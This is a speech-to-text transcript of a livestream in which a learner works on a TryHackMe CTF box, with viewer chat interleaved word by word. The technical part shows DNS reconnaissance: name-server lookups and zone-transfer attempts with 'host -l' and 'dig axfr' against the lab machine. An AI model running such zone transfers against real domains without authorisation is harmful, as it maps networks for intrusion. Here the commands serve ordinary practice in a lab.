hopping back to the box. And what I was doing, right, I was actually adding, let's see if I destroyed my copy with something else. That was good information.
MMLVX says,
There.
I'm always doing W instead of Control S low.
W instead of Control S. Oh. Colon W. Oh, right, right.
Wow. Nice
I
TTS
try to
voice.
stay
Deep.
out of complicated editors. Scope. Let's do IP2 because this is kind of a hint.
Sorry,
if you had
it's a
known
good
more
thing.
before that it was a DNS thing here, right? Yeah. I get it. That's what I mean with complicated editors. You can't even exit, right? So I have gotten stuck in Vim, but I have also gotten stuck in in Emacs, and I am so happy when Nano arrived, and it was so simple. You just Ctrl S X, and you're saved and out of the program. Wonderful. The same things that you use in like DOS programs back in the day.
Goaku says, Vim is the best.
Sure, whatever you like. I'm not like religious about it. I just don't remember all those shortcuts. It's too much for my brain. I want to learn about these things, not trying to remember commands in the editor. So I do the easy road, not the coolest maybe, but the easiest.
I used Emacs, but I felt it was slower than Vim.
Okay, I don't do any like multiple select things in any editor or things like that.
Easy is good.
Yeah, that's how I feel. Easy is good. And now we have the scope and we understand better that this is the domain name, you know, and why it is like this.
Says, there's a reason Vim is the default editor.
Default editor for what? When I'm in this one, we have at the start we have this
Christy
one,
says,
you know, text editor.
On the road, we back home in 30 minutes.
Okay. So your day is your work day over, maybe. So
MMLVX says,
my fingers want to do
yes,
Control
if you
V.
SSH somewhere, Vim is just about always there for you. Goaku says,
Yeah, Nano too.
May I ask
Nano
about the
too.
table push-ups?
Thanks for the reminder. Let's keep the brain working, which is movement, right? You have to move too. You can't just sit still doing nothing. I actually have training pants today. So this is just simple. I have too tiny floor space, so we'll do this. But I can feel that from yesterday I have a bit of training aches in these muscles, so it's dust things. Especially if you do them slowly. So it's probably the right level for me right now. Oh my god, let's do another one. There.
Thank you for being healthy.
Yeah, I'm trying my best.
MMLVX says, /o/ translated from German.
Let's say the brain wants to move because otherwise it will fall asleep, right? So if you just sit for too long, you will just...
Goaku says, how is /o/ German? Lol.
Maybe there's a word like oh? I don't know. Oh, I see the emote. Yay. Cool. I've noticed a few of those. Christy uses those. It's new to me. I like them. So Christy, yesterday you used like the wave with one hand, and first I was thinking like, what is that? And then I saw the image of it. I can't get that I've never seen those before. You know, all the years.
Vohiyo. Translated from Uzbek.
So, oh, my water is okay. So almost a third left. Let's do it. Let's do it. We know now that we have the scope of the domain ironcorp.me, and we
Christy says.
have the commands.
Which? 07.
Yeah, I think so. But you did different ones in Siren's chat there. I think you did one arm to say hi and the other to
Or
say bye
/
or something. Oh, yeah. I don't think it was 7. It was like more like this. Maybe like. Let me see.
Go
You could do like
says.
this too. Oh,
High
maybe
pans
not.
2, high pans 1.
I'm just testing this new thing.
Fixit says.
\O.
Translated from German. Goaku says. Rule 5. Christy says.
\O yes is as well salute 07.
Yeah, okay. Yeah, because I was thinking this is more of a salute gesture there. Oh, cool. Nice to know even more emotes.
Goaku says. PogChamp. Translated from Tagalog.
Let's type something now. We have all the
Christy
information.
says.
We just haven't done
Yep,
anything.
thumbs up.
So let's see. No, I'm not. I'm typing in chat. I'm not on the machine. So host. And as you can see,
MMLVX says.
I have done host
A
before,
salute
but
or waving. There's some ambiguity low.
yeah. But that's with all emotes. Some people seem to think that a normal smile is grumpy, you know?
Goaku says. Yeah, hello or goodbye.
Yeah. So let's do dash T. No. We have to look at the help, people. I can't do a command without. Let's see if it does H. No. It didn't, but it defaulted to help. So does it do help? It's also an illegal option, but we got the help. So this is a very nice and short list of the switches, and we are going to use T and L. Select T, specifies the query type, and then we have NS after that. So we will. Okay, that's nice. The type is NS. Then L later. L lists all hosts in the domain using, and this is kind of the focus here, right? AXFR. So let's actually do a short addition to the
MMLVX
notes.
says.
NS for name server, I guess.
Yeah. And that's also what the entries are called. If we look back, I know that you wanted to have the video URL. So I imagine your let's see, what one? This one. So if we just go back a bit here in his, yeah, here you can see. Let's see if we can see anything. Here. So here you can see in the type of DNS record, you can see here NS. So these are the name servers. Okay? So these are name server entries in the DNS. So that's probably 2. We could probably do A and get all the A entries, and TXT to get all the text ones. 35. I've not seen that. But I'm not used to DNS much in the last years. Okay, let's... No, my goodness, you couldn't even see it. You'll have to say, show me the right screen. Okay, so I'm showing you again. So here you can see what you're actually seeing. Here are the name servers. Here is a type of the DNS entry. So, all the different
Goaku
types.
says.
That's a cool voice.
Yeah, that's a cool voice. As long as you don't select one that I can't understand, because then I will have to look at chat, you know? And I'm trying to focus on the learning. So, that's the different DNS type entries. So let's go back to first the notes. And let's add these. See if I manage
Fixerbot
to
says.
copy this.
New follower Twitch. New follower Wildegar. Less than 3.
Welcome in, Wildegar. And I'm actually cheating a bit on the names because I have the TTS say them before. So before I do welcome to someone, I actually usually heard it first. Is that cheating? So I'm just copying from the host default text. If you type something odd and crazy, we get this information. So, maybe we should just have them under the commands. So this one does this.
MMLVX
Oh my god, that's
says.
an annoying feature.
If you're not cheating, are you really trying? Low.
Okay, so now we have this information.
I have to go. Thanks for the stream. Catch you another
Okay.
time.
Yeah, you're so welcome back. And also there's a Discord. Let's do the Discord command. So anyone who's not in the Discord, you're welcome to join and we can just talk about stuff. And I also have a chat that is intended to learn together. And yeah, let's do that. We can just talk even when it's not stream, you know. I'm also thinking of maybe we should have one Discord group where people actually are audible on stream. So if you go into Discord and go into the group, you can talk on stream with your own voice instead of the TTS one. There's always a delay before the TTS speaks to you. Anyway, I guess there's the risk of trolls, but that's always something you have. So let's go. We have checked these. This will always be available for us. So if we just, let's not clear it, it can be there. If we need the help, it's there. So now we need to use the T. I copied the wrong one, not the type one. And no one said anything. Look, I put the TCP IP mode. There, now we have the query type, which is the right one. I was like, what did I do? There, and now we know the name of the domain. It's in the info tab, and I'm copying it because I'm so darn lazy. That's the risk of putting too much stuff to the side. So that's our invalid host type. I forgot to actually type NS. There, and we have the two name servers. As in my notes, I used NS and they didn't, I think. That's a very usual name for a name server, right? So we have the names. So we should add this to our notes. If it's slow, I'm sorry. If you like it, yeah. We want to add an actual DNS here. DNS. Should we do 2 on it? Let's do 3. We look at the web page. There was not Madeira though. So DNS. And what we did is, let me just copy. And let's paste this. So we have the names of the name servers there, and with these we can go to the next step. And this is the next step. Let's open this as a new tab. So we have all of the tabs, we have the information, we have the commands for DNS, and we have what we're actually doing here.
RZM44636 says.
Which box?
This is, let's see here. Here, Iron Corp. We can put the link. Let's add it. Let's add it to the stream.
Fixit says.
Web link.
Iron Corp. So it's added. So I like this thing that my old knowledge, like I know how a DNS works, connects to the new knowledge of how to do all these hacky thingies, you know? Because normally you wouldn't probably just command line the NS information. Maybe you would. Depends on who you are and what you like. So I'm not copying any commands because I want to learn this. I just want to make sure, yes, we added the, and NS1 would, I mean, we could just guess NS1. Everybody uses that, right? So host L, but I guess in a box it might not be that. Domain that, no, my goodness, why am I doing that? This is the domain, so this is supposed to be Iron Corp dot me, and then so this is L, meaning this is the domain for which we want to list all hosts using AXFR, and then the name where we want the information from. And it is ns1 dot, and I assume we will have to try both since it is a box. Domain.com. And for new people, I'm kind of new of this, but I have old IT experience too, so it's like a mixed thing. Let's just see how much we get. Okay, that's not a good... Well... Let's try. That's kinda... Is that really it? Should we do the Iron Corp.me? I was like, what? No? Let's see. Let's look at the... First, did I type the right command? Domain.com. Did I use the right domain name? ironcorp.me. And something happened in chat, so I looked over there. No help from Noah. And then domain.com is my example. And then ns-domain.com. We got this name server name. And when we tried that, we got this. And let's see. No servers could be reached. Connection refused. Let's just, before we try anything, did I change anything? Yeah, I tried that. And this is the actual name. So let's try the 212 and see what it says, if it's the same thing. No servers could be reached. No servers could be reached. And it says the actual name is above domain. So I'm having scrolling chat problems here. I can't scroll. General SMO. Did I do something wrong? Let's see what you said before. I'll scroll up. I think I that's about. Yeah, when we were watching the video, you wanted me to type something. That's what I'm looking for now. That was, how long ago was that? I'm scrolling this tiny chat box. Nah. I should have a bigger chat open, right? Let's go to the chat here. Oh, this hasn't scrolled since forever.
Generalissimo
since
for 69 says.
Dig at 10.10.248.253
Was that what you
ironcorp.mex.
Yeah, but that's
IP is the IP of the machine.
Yeah, but if I want to do it with host, we get these messages. I'm trying to get the first command to work first. But we can do dig. There might be a difference, yes, of course. My god, I'm just scrolling through all of chat since we banned that person.
Try the IP instead of NS2.
Okay, yeah. Let's do that. My god, oh, now I'm back there to the bottom of the chat. And let's just switch to what? There. So if we try this with the IP, and they both have the same IP.
Try this too. Let's look up LSD web link.
Yeah. Let's see. Yeah, you're watching what I do. So
the 103 IP is a real public IP. Wouldn't do that.
Okay, but why is it doing this then? Because
it's a CTF. Everything is inside.
Are you sure of that? Because sometimes they have their own domains.
In real life, you would be correct.
Test. Yeah. Well, okay. Let's do the NS lookup. Invalid option D. And this is our machine's IP. We can do the machine's IP.
NVM use dig D. That's what I've used.
Well, let's see.
Just tried alternative smile smile.
Yeah, we'll try that. Let's just try the machine's IP. If everything is, local. Or rather... I'm just trying to remember the IP. 7183. Didn't I have like the IP 2 seconds ago? There could always be the restart the box problem too. We'll see when we try the other commands.
Lol. Okay, just choose dig. D.
Yeah, I'm going to. I just wanted, to try them. See? You learn the most from the problems, because then you have to try to find your way around the problem. If dig works, I still want to know why host didn't work. If dig doesn't work, then we know something is off.
Translated from Portuguese.
Oh, good morning. Good morning.
Generalissimo for 69 says.
It would work in RL.
Yeah.
CTF is confusing smile smile.
So... No, why do I keep... This is my example. I should have done square parentheses, But I thought that domain.com or server.com and things like that are kind of, easy for notes. So I also noticed that I didn't do domain.com here. So there. So dig, and we do iron core. Why do I always try to write copper.me, right? And then we do tns.t, and here we have to check what -t. It must be type, right? But so type name server. Yeah, and we get these, which is what we got before too, from, oh my god, it's far up.
Now instead of these, just use the IP D.
Okay.
In RL it would be correct smile smile.
Yeah. Okay, I won't use the... Oh, there we have that. I have to look here. So, possibly we could use some kind of switch here to get more information. Or maybe we don't get that information in host. So maybe dig is better for this. When we don't have the real stuff. It's just all fake. Fake. So let's do dig AXFR, and the more times I type
Still
AXFR,
good learning
the
value.
more times I will. Yeah, very much. So AXFR I will remember easier every time I type it, and then it's the domain name, which is
I saw labs with real DNS set up and it would work there.
Yeah. Great. So ironcorp.me, and then @ and then we would use the IP. But first, I want to try, because we have to try at least. This sounds very, very not real, above domains. So, yeah, I'm not very surprised there. But that would be a hint to use the IP, which I guess that the person who made this box
I can give you a real one if you want.
You mean a real lab with real things, or what? 233.2. Wait a sec here.
Dig, web link. Dig at Web link. Smile,
Oh,
smile.
Yeah, okay. Okay, so that's the test one then. Let's see. We can also use the ones in the video. So let's click and see. We got the fail again, and I see the.
That's
the
unrelated to the
53.
machine. Just a real example.
Yeah, I get it. I'm thinking that the example they had in the video. Let's see where it is. Wrong machine to tab.
Fixed use the IP of the machine, not 192D.
Yeah. I was just trying all the options. I started with the actual domain above domains.com, you know. So let's get the video here. He has, what's his example? So he asked us also to check the second one of this. So this is also a test one, you know. So I guess it's from some kind of lab thingy or something. Maga, I forgot again. So that's why there's the left and the right command. So now I'm at the left screen, and I was just showing the video, and I didn't show anything. So total switch monitors fail again. So do we remember the IP? 10.10.71.183. Magical memory, or did I just happen to have it up on the other screen? You know which, since we just looked at the page. So let's run this. Yeah, join the Discord, people. Join the Discord. I'll pop in there after the stream, you know. I don't have Discord on. It tends to crash stuff in my machine, especially OBS, actually. So, well, we are getting the same message again.
The machine is broken.
Yeah. That's what I said. If we get the same message from day 2.
Disconnected or the host's file is incorrect.
Let's check the host file, because I had my worries about the host file before, you know, for yeah, but that was when I thought something else. So okay, I sudoed that after, so now it should there it should pop up. So, do we need to add something more, like some star or something? Yeah, right. You can add these.
No.
But we haven't used anything else.
Then the machine is disconnected.
Yeah.
Restart it.
Well, it's not disconnected. It's just th-damned. So, what was it I did the other day? No?
Christy says.
Yeah, this is this.
VK home. Exhausting.
Generalissimo for 69 says.
Worked fine for me, frown frown.
Yeah. I guess the host should probably work too, you know? So, now we have
I
two
did this
tools
machine
that
this
failed.
morning. Very good
Okay.
warm up.
Ah, good. So, I'm just closing an empty notepad. Let's go over to the machine. We'll show you. So, welcome home, Christy. We'll have to edit the host file again, though. We were just there, so it won't take long. Just open it up to prepare. Didn't I click terminate?
Christy says.
Thai Sophia.
Error terminating. It can't even terminate. Doom da doom da doom. So that's a new error for me. What do we do if we can't terminate the machine? Maybe it's not running. Let's just oh, this is so annoying. I can't find I can't find the find at once. No started. Yeah, it's still started. Now it's a new window. We can't terminate it. Error terminating instance. Let's just close all of these Firefox windows. Or we could just Any tips? That's kinda annoying. It's kinda broken.
I close VPN.
Yeah.
Generalissimo for 69 says.
Yari set the VPN connection.
Christy says.
Okay, we'll do it.
Restart VPN.
I'm stopping it and then I'll try to terminate.
Generalissimo for 69 says.
Maybe that was the whole problem, D.
Yeah, that's probably the problem. The thing is that it doesn't help to turn off the VPN. I have no VPN on. So we can't wait 48 minutes. Recently, I've had much more problems with the upload world room, you know, that I was doing. Okay. So is this what really pops up now? I was looking for the dashboard. So this one.
Never had problems with THMBTW, and I finished more than 500 machines there.
Okay, yeah, but this is just now. This one I had to restart twice. Because just the first thing I entered worked. 1 second, I'll be back. Just a bit. Okay. Ja, ska jag komma ner eller? Ja, jag har dörren öppen så det är bara att ropa. Va? Ja, jag godkänner. They're installing games on another computer and I need to approve Google approve on my phone. Är ni klara? Ja. Vi bör komma och säga till. Jag hörde när du ropade så du behöver inte komma upp nästa gång. So, let's continue. My husband and my 30-year-old, they were installing stuff. Oh, I'm just going to check. You know, I sent a message. Just check the reply. Oh, he's so cute. Oh. Let's see now. And I got a happy Easter message too. So while I had my phone up, you know. So we're off in Sweden. It's a holiday. So that's why the stream is starting to get a bit long. Oh my goodness, 5 hours passed. Well, let's keep going. So we have the problem. We had a very nice pause here. So I could always
Christy says,
open.
Happy Easter.
Yeah,
Yes.
Happy Easter. So we can always tell them we wanna help. We wanna help. This is always funny. We'll see what pops up. So bug and bug. Well, I could just send a message on Discord. I can't close this thing down. Now let's just.
Generalissimo for 69 says,
Did you try to refresh the page?
Yeah, and I control F5 it. I'm just going to close down all of the
frown.
Too. But whatever, they need to know that now. They know it. Let's just hop all the tabs to the one browser here. There, and closing it. So at least we
Christy
have
says,
a fresh Firefox.
Try join a random one. Will DC you from anything.
1 second here. Too complicated password. So are you sure I want to terminate? Yes. Error. So try on a random one. Yeah, I thought about if I start another one, but
join any other random room.
Join or start? Because I don't think this will affect that one, right?
Generalissimo for 69 says,
Fix it, web link. Enter it.
Yeah, and there we have both.
Christy says,
Join and start another room.
Generalissimo for 69 says,
Yeah.
Yeah,
okay.
You got two machines running frown.
Yeah, so it's no problems with a multiple. What I'm interested in, why is this null? Is this why it fails? Because it's null? Because this should be the... No, this is a wait time for it to start, probably. Yeah, so now if we reload this page, it will be like 20. Or it started. So it's no problem with that. It's just because it was starting. And there's also the IP. This is interesting. Thanks. So if we terminate this one as a test, can we terminate the machine? Yes. That worked good. So if we terminate this one, something is very off, meaning I'm going to the Discord and hoping stream won't stop.
Very strange.
Because it's very buggy. Yeah. So I haven't had this problem before, but I have had more problems with TryHackMe than I've ever had, like the last week. So,
I can give you the API command to terminate Iron Corp, but it needs your CSRF.
Wait a second. I was just looking in my Discord for things that I have too many servers. Oh, here, cybersecurity, TryHackMe.
Curl location, web link.
I'm just thinking if I send a message here.
Just get your token, D.
I'm just looking here. If I look in the let's oh, we got another message now. Error terminating instances. I guess that we have 38 minutes, if nothing else. I'm kind of interested now why we got another message. Was this the same? I don't think we had this. I think we had terminate machine before, not terminating instances. $37. So oh, I had a mention in the room bugs one. My goodness. Sorry, people.
FixerBot says, time to move it, move it. 10 squats
yeah,
redeemed.
+1 for this request. Okay, let's see by disabling the script altogether. Okay. I'll just answer. I'm just like I got it working by doing a pause F5 to reload all pages. There. Oops. My ear is falling out. Or ear is falling out. Oh, I think I want to swap ears. That was kind of hurting. Oh. Vänta, jag ska bara gå och ropa. I'm just calling them. Evan kommer inte, okej? Jag messade till honom och så. Han sa faktiskt att han kunde komma en annan dag, jag frågade. Så. There, so. Sorry for speaking Swedish to you. It's this thing that I said. I can't type Swedish when I'm talking
says.
English.
Squats time? Redeemed.
Oh, cool. So I will just have to do squats and sit-ups and everything until 30 minutes has passed. But we can try that thing. I'm just kind of, let's see. What's a running one? API command. Okay, I read what you said now. Let's just copy those just for, I don't think I'll, it's not that we can't find things to do, right? Also, I will need to get something for more lunch than a tiny bit of bread.
Says.
Fix it, web link. Get your CSRF. Then do the previous command.
Yeah, I get you. Just one thing at a time here. So we have squats redeemed. So let's do the squats. And then I'll go get some food. And then we'll do that, okay? So I don't want to by mistake do something that I shouldn't do, you know? So if we can just by nature naturally happen to go to that time. Because this, well, it's still 33 minutes, so, but I think it was much more when we started. Squats. How many squats do we have? 10, right? So let's see if if my thighs can feel this or not. Oh my god, even as deep as I can. Maybe I should have done them slower.
Goaku says.
Fast squats thumbs up.
Yeah, but maybe fast squats is cheating, because that's not as hard as slow ones. Let's do this. Let's add a text, because I don't know why I didn't have a text. I removed it, I guess. I'll just let's do this.
Fast squats equals faster heartbeat.
Yeah, okay, but muscles don't have as much work to do. So let's see. So my thighs didn't feel this. I got a bit faster breathing though, I guess. But you can redeem all the things, you know? They're on independent timers. You can't have me hopping around there all the time. If you keep redeeming them, it's just 5 minutes on each thing. I should think of what I'm doing. I'm going for the cameras and stuff. cameras and stuff. There we have cameras and stuff. And I wanted the time one actually. So where's the time? There. So let's copy it. And let's go up to the left screen. Yeah, I want this on the left screen. And the right screen, I don't have one either. So, since we're on this, we don't have to do studio mode. So let's paste a duplicate. Cause I forgot that last time, and then when I did a BRB text, the clock was just saying BRB. Cause I also changed the name of it, you know, when you change the name of something that's a duplicate or reference, then you change both of them. So let's just BRB. So name already in use, of course it is. So BRB, what, I don't care what it's called. Let's just add a text that's not 1537. BRB, and, or rather, just getting some lunch. Lunch. And be right back. There. And let's get a bigger font, because this will be tiny. Let's see how big this is. Kinda big. So let's just make it actually a new line in there. And we can also center it, right? Alignment at the bottom. So, oh, that's kind of fun with the colors, but that's not what I want. Oh, whatever. Also, it's still too big. So let's do 160. That's probably enough. Oh, I want the text to be all of the letters that way, you know? Maybe we should just change it. So let's just transform, center to screen, poof, and now you should still see that, right? Well, let's see. It's not easy to read though, but horrible, really. I'll just go get some lunch, but I want this to be readable, at least readable. So let's actually change this. We don't need gradient, but we can add some outline, and we can add the we can change the font. Let's see, font to be actually bold there, and we can change the this color to be like a bit darker purple, and this one to be a bit lighter purple. Or let's do the dark one with a light. Oh my goodness, with a lighter one there. So, and let's make it more. This should be like readable. What do you think? Alright, I shouldn't move it. I can't see it at all then. There. So, I think I'll be right back. I'm just getting some lunch because my tummy says food. And we have some few things more to fix later. But then we'll go right back to this. So if I scroll it a tiny bit, or we can even F11 this. Why didn't it work? There. So if someone pops in while no, I'm right back, right? No, you could see it, of course, too. Just carry some stuff down and get some quick food. I'll be right back. I won't be long.
Christy says.
Okay, enjoy. In eating as well. Guacamole with brock and a veggie burger, coffee and sparkling water. GG, I'm full now. Full rather, but full as well lulz.
In a few minutes the microwave will beep and I'll have some food. But I'll eat it here, so and they're busy with stuff. I buy these gummy bears with vitamins for my kids, and then I eat them myself too. All right, it's a broccoli and cheese pie. Guacamole with broccoli and veggie burger, coffee and sparkling water.
Yet broccoli is so good. Smile, smile.
Yeah. I didn't like pies. It's, you know, the bread, it's so like fat and crumbly, but this kind is kind of okay. It's okay. This works. It was like a few minutes when I went up. It's 7 total. It's actually 3.5, but I do it half speed, you know, it gets better in the microwave. Right, we also have this. Because we were waiting for, I will have to reboot my computer for this, connecting this. Because the hard drive that's I'm recording this to the hard drive.
I don't really cook. The least time I spend in the kitchen, the better.
I could cook, but it's usually like yesterday I made spaghetti and meat sauce for the kids. Yeah, so it's mostly that kind of thing now. All the cooking time goes to the kids. But sometimes I make like, I have this, let's see, I had on my Facebook. Okay, this is the only browser we have open. Let's open another one. I'll just go there, see if I can find it. And my Facebook is not secret, and I have Facebook. Alright, I was of course my sister's bunnies too, but that's enough to show mine. So this is my kid a few years ago. It's 13 now. Yeah, so this was kind of good. So you don't have to have any of the things you don't like. It's just chicken on top here. So seaweed and stuff. So yeah, that's when it was snow. I don't use Facebook very much.
Looks nice indeed.
Yeah. It's just noodles.
And fast to be make.
Yeah, very easy. Though this is garlic. So there's mushrooms here, I think. So different stuff in there. So mostly shopping time for. I heard the microwave. I'll be right back. I'll just get it. So actually more finger food. Oh, we're getting an expire message. We don't have time. How much time is it left? 14 minutes. We can eat some food, though this is kind of hot. You can see the broccoli. When you stream, it's kind of nice not to, you know, have to use a lot of space on the table.
Enjoy.
Yeah, you too. You too. I can never finish one of these. It's kind of a lot of food, but maybe I can now because I've been up for some time. Though I finished my yogurt wasn't very long ago. Though I guess it kind of was, right? All right, 7.5 hours. How could that have been? How did that happen? Let's remove the message, but I'll keep it here. And I'm actually going to copy this and have the same message on my right screen, if that is what I want to show, you know. So let's copy this and paste the reference on the right screen. So let's paste reference there. So if we're on the right screen here and we want to show this message, we can do that here. And we can change the text of the message, of course. So, and as always, when I pause, the viewers drop, which isn't very strange, but so why is this blinking red? Isn't it charging? It's probably just not charged full. So, like F11 there. So while we kind of wait for 10 minutes plus to pause, it's not much left now. I'll just take the opportunity to see if the YouTube videos, yeah, they're all finished now. So let's look at these, cause the reason is that I don't want to spend 2 eternities, you know, on editing stuff, and I don't want them to just disappear. So this is kind of nice to just if we edit this one, we can see which of these is the best. Maybe this is better, you know, to-do list or just Kali. This is the actual box there. My god, stop showing me these. And we'll have to remove because it will have auto. Oh my god, stop showing me those. It thinks I'm new. It thinks I created my YouTube account 2 days ago or something. So, games. Let's remove games. That's what I was going for here. Whatever. I should change that it's actually saying, where is it? It's category gaming. What's the category of this really? It's comedy. Watching me trying to do a simple thing could be comedy. Science and technology. So we should change them all to science and technology. And we should of course set it to English. So I guess if I can't find it a way for it to do it automatically, I can't type either. So we'll have to scroll to English. And it doesn't have a caption. Caption certification. This content has never been aired. Title description language. You can't even type one letter here. Do you have to scroll? That's so bad. And the recording date of this one is 18th. So 18th. So this one is updated. So let's see. Then we have this one we looked at, but we didn't set it to. I guess this is not science and technology anyway. IRL. Those are kind of funny. Funny image. Sammy. Why my phone? Well, this is probably the more better one, because people won't understand that this is a Sammy deck on full screen. I guess I should make playlists. And more. Can't it just always show more? Okay, so this is something we should say no to all the time. So this is AI fakes. I hope we can set defaults for these. So remove games, set English. Sorry for this is for 10-minute delay and my food is too warm to eat. So if we didn't have the 10-minute delay, I wouldn't do this now. So I would save you the horrible. Let's see, why can't I? So 15th, 2 weeks ago. So this would have been removed today or tomorrow. And the first one there was the IRL test. It was removed before this one was started uploading even. So we don't want gaming, we want science and technology. Whatever. That's good enough. So this is just live streams. So, should we... let's check the time. I know there's other ways. We have 6 minutes, so let's do this one too. What category should actually being out in the real world? Someone said in one of the IRL test streams, "Oh my god, the programming touching grass." So this we should click on all of them. And it's Twitch on all of them. That's Twitch adding it, you know? It wants to add itself. So let's do English. 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 I thought I'd set this. I'll just skipped it because it was... oh, right. And this must have been the 14th then, since it was gone today. And it's not gaming. What is it? Sports, travel and events. It's still a test. It's an IRL test streams. Oh, whatever. Let's do science and technology, since that's why I stream it on this channel. Since it's checking the stream, you know, it says test stream, and trying different options, changing. I'm asking people, is this better? Is this worse? So let's start the next upload now before these are done. So if we go to the list of all the videos, all the streams, so this and this is done, and this is not done. So oh, I forgot to change the title. This is an IRL stream. I can edit it here, right? So this should say like IRL test stream. There. Oh, I never thought of that. You can actually change those, right? And I didn't think of that. So this is, if we do export, and this is from the 18th too. So let's add 2024 0318. I might not do that all the time. We'll see. And this is IRL test. Let's do the comma so it sets it as separate. It's supposed to be public and start the export there. Now it will be adding another one here. Let's just see that it gets started. Yeah, so now it's processing. And I will be getting lots of emails saying this one is done. Let's reconnect the VPN. And let's get started. Because I assume the box will be able to terminate by timing out. I'm talking too much when you're typing a password. Maybe that's not a good idea. So, actually, we might have fixed the problem by actually closing this one down. Because these are like open connections here. And burp. I tried something in burp maybe. I don't remember. Maybe not on this one. Probably from memories from yesterday. Let's go back now and see. And maybe my food is edible. It's like a tiny pizza. Oh, still hot.
Fixerbot says, "Welcome Raiders. Gar7 brought 47 friends to the party. Go drop them a follow."
Welcome.
Or
I could need
says,
some help there.
Tomb Raid.
Christy says,
GG.
Welcome in,
Translated
everybody.
from
Thank you so much for the
Fixerbot says,
raid, Gar. Thank you
"New
for
follower
the
Twitch.
raid.
New follower Iron Dap Rise. Less than 3. Dragonov 308
Welcome in,
says,
everybody.
Gar Raid Twitch Raid.
Fixerbot says, "New follower Nightoff Dark 94. Less than 3.
Thanks so much, everybody. Welcome in. We got the suggestion that this bug says hard is actually
New follower
easy.
Akai Shizen. Less than
But then
3.
it was not.
SP4
It died,
RKSK
and we
says,
can't terminate it.
Dark
Look.
mode seems good.
Fixerbot says, "New follower SP4
Yeah,
RKSK.
we go dark mode.
Less than 3.
Always. And I'm going to add the
Shellfish
channel point
says,
redeem that says
Hey,
bright light. You know, from my
Fixerbot
goodness,
says, "New follower
Gremlins.
Dojin
You know the Gremlins
1337.
ones.
Less than 3.
Hey, Shellfish. Hey, welcome in. Oh. Oh yeah, Christy, you were in both, of course. Of course you were in Gar's stream too. And I missed your stream, Gar. I'll have to watch it later. I'm very curious. What did you do? Tell me. How was the stream, people? Tell me all about it.
SP4
Now we have 20
RKSK
seconds more to
says,
wait there.
You do lock picking?
Yeah, I got actually 1 week ago. My package with the first lockpick arrived. So I'm not really good at it yet. But I have picked the test locks and a few others that I had. Yeah. So the machine was terminated. And how we have been waiting for this for like quite some time. Because this machine could not terminate. Look, it didn't terminate. Okay, we have a problem. I should have just clicked the start machine button. Oh, no, what should we do? Anyone have a suggestion? Why didn't I click the start machine button? It wouldn't have worked, right?
Fixerbot says, "Time to do some lock picking."
Yeah, that
Sec
guy.
guy says,
Good suggestion.
Log out
Let's
and
do
log
it.
in?
Let's log out. So log out. I thought that since I'm still about to eat something, I went to make some food, or let's just heat it up a pie. Broccoli and cheese.
Ian Daprise says.
You log out, maybe even delete your cookies and log back in.
Yeah. Of course we could do that. Let's just...
Have a great stream, fix it. Busy Friday ahead, but I'll be lurking.
Okay. If you want, just tell me, what did you do? Just a short one, right? What were you doing on stream? Let's just enter my password.
Christy says.
Why, Gar?
Yeah, have a great day, Gar, and thank you again for the raid. And I'm just hoping for a tiny description, but someone else could probably give it to me anyway, so. So we have logged in, hopefully. Let's see. We did start the VPN again.
Ian says.
See you, Gar. Happy Easter and Good Friday.
So I turned off the VPN too. We have a bit of a problem here. I did send a message in their Discord. I'm just replying in their Discord. Also waited for the box.
Set guy says.
It's same last week's stream continuation THM box about WebSocket.
Wait a second. I tried Control 5. So someone thought it was because files were cached in the browser, and we have Control F5 a million times, so... And also we don't seem to be able to log in again. Look. What happened? If we can't log in, we can't do anything, right? Look. Maybe this will be the way anyway. We'll see. We didn't get a password. Did we get the password? Let me see on my phone here. We will find something to do if we can't do this. I didn't get a mail from them. We'll try making a new, or we can just make a new one. Let's go back again. So I kind of think that this doesn't look very good.
El Bandito box and fix it will be back in few minutes. Going for dinner, smile, smile.
Oh, dinner times. Yeah, right. El Bandito box. Oh, okay, you finished it, or you've continued it? Because Gar was kind of looking at it the other day. Was it yesterday? No? Wednesday? Wednesday, it was Wednesday, right? Yeah. Okay, have a great dinner. So, I'm thinking... I'm just checking the chat messages so I didn't miss anything. I'm thinking that this seems to be some other problem. So I'm just typing that I logged out in their Discord, and I'll can't log in. We'll have to restart if the stream is ended. We can also try the cookies, of course. But this feels kind of odd. But let's try those cookies. Let's just see. Right. So, so this is, I was just test streaming to it. This is the channel that I will be doing more IRL stuff on. So, let's see, I made a about there. But we can't see the tags when it's not live, right? So it's like being outside in the world, like running in the forest, exploring stuff, maybe in Stockholm, maybe some ruin somewhere in some other place, maybe, you know, learning music, learning whatever. So I'll split it up. And I just made a VOD channel, so we're uploading to the VOD channel. We can remove these tabs. What else? This is from Gar's event, my Google's there, and the links I got, and I got this one too. That I need to do this, right? So let's log in, and it was months ago that I made a login, so it might just have been purged, you know. Someone creates an account and never uses it. How many of those will they get? So let's create an account here. And my not secret at all email address, and my name is Sophia. So Sophia at fakesite.no.se. We'll see if it says, oh, we already got this one. Thank you, check your emails. Okay, so it looks like they had no idea that there was an account on that one. I'm going to look a bit on that Discord, but I want to see here on let's see if we get a mail. Refreshing. And I have gotten your follow emails to my mail, so the mail works. Oh my god, so 8-hour stream. Will I beat the record? I'm actually not tired at all, so sorry for keeping you waiting. Any suggestions on something else to do? Cause yeah, we can just log in again. I'm not a robot. And that's another email. That's not secret. That one either. Oh, we got in this time. Look. So now we can actually try more things. So let's go back to the box. Or maybe we can just... There. So... Yay! So, let's see. I'm just looking who suggested. Was it that guy that said I should log out? Great. Now we can start the machine again. Also, we should complete the registration for Portswigger. While we wait, it's a 7-minute start machine, Windows machine. So... I'm talking too much. I've been talking for 8 hours, alright? Gotta have some water. And I spilled on my table. And on my leg there. So, since I got the mail from Portswigger, let's click it to complete the registration. And I guess they will be smart enough not to show stuff you don't want to see, you know, on something, but just in case. So, alright, name. I should probably do Fixit42, right? It's just asking me. This is kind of confirming that my last registration was just purged. There was nothing there. I tried to... Oh well. I'm just entering my email again. As soon as the registration is done, we'll continue with the box. No, there. There. So what it did, and I'm happy I put it on another screen, because it sent up in clear text a password on the screen. Portswigger. Yeah. And Will thinks that's a bit funny. So we have an account on Portswigger. So it's there now. So we can play with that later. I'm just closing down my email. I'm starting the VPN again. So let's just start it. And go back to our stuff. And all the commands just failed. So that is the reason. Stuff didn't work very well there. Yeah, and we have made some notes today because I'm a noob and I'm just trying to learn stuff. And I got the tip from Generalism02 that this box is not really hard, as it says it is, but it's easy. So we'll see. It still hasn't had its 7 minutes, so we'll have to wait a bit more, I guess. At least we have arrow up commands. We don't have to type a lot. Why did I look at the right screen? Well, not the 